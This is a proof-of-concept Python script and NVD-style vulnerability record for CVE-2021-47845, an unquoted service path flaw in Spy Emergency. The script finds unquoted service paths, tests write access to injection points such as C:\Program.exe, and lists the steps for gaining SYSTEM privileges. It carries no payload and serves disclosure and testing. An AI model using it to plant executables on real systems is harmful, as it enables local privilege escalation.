CVE-2021-47845

# CVE-2021-47845 PoC - Spy Emergency Unquoted Service Path # This PoC demonstrates the unquoted service path vulnerability in Spy Emergency import os import sys import subprocess def check_vulnerable_service(): """ Check if Spy Emergency services have unquoted service paths """ try: # Query Windows services for Spy Emergency cmd = 'wmic service where "name like \'%SpyEmergency%\'" get name,pathname,state,startmode' result = subprocess.check_output(cmd, shell=True, text=True) print("[+] Spy Emergency Services:") print(result) # Check for unquoted paths with spaces services = result.strip().split('\n')[1:] for service in services: if ' ' in service and '"' not in service: print(f"[!] VULNERABLE: Unquoted path detected in: {service}") except Exception as e: print(f"[-] Error checking services: {e}") def check_write_permissions(): """ Check if current user has write permissions to vulnerable paths """ vulnerable_paths = [ r'C:\Program.exe', r'C:\Program Files\SpyEmergencyHealth.exe' ] print("\n[+] Checking write permissions to potential injection points...") for path in vulnerable_paths: directory = os.path.dirname(path) try: test_file = os.path.join(directory, 'test_write.tmp') with open(test_file, 'w') as f: f.write('test') os.remove(test_file) print(f"[+] WRITE access to: {directory}") print(f"[+] Attacker could place malicious executable at: {path}") except: print(f"[-] No write access to: {directory}") def main(): print("=" * 60) print("CVE-2021-47845 - Spy Emergency Unquoted Service Path PoC") print("=" * 60) check_vulnerable_service() check_write_permissions() print("\n[!] Exploitation requires:") print(" 1. Write access to intermediate directory") print(" 2. Wait for service restart or system reboot") print(" 3. Malicious executable will execute with SYSTEM privileges") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2021-47845", "sourceIdentifier": "[email protected]", "published": "2026-01-16T19:16:10.347", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Spy Emergency 25.0.650 contains an unquoted service path vulnerability in its Windows service configurations that allows local attackers to execute code with elevated privileges. Attackers can exploit the unquoted file paths in SpyEmergencyHealth.exe and SpyEmergencySrv.exe to inject malicious code during system startup or service restart."}, {"lang": "es", "value": "Spy Emergency 25.0.650 contiene una vulnerabilidad de ruta de servicio sin comillas en sus configuraciones de servicio de Windows que permite a atacantes locales ejecutar código con privilegios elevados. Los atacantes pueden explotar las rutas de archivo sin comillas en SpyEmergencyHealth.exe y SpyEmergencySrv.exe para inyectar código malicioso durante el inicio del sistema o el reinicio del servicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/49997", "source": "[email protected]"}, {"url": "https://www.spy-emergency.com/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/spy-emergency-unquoted-service-path", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49997", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}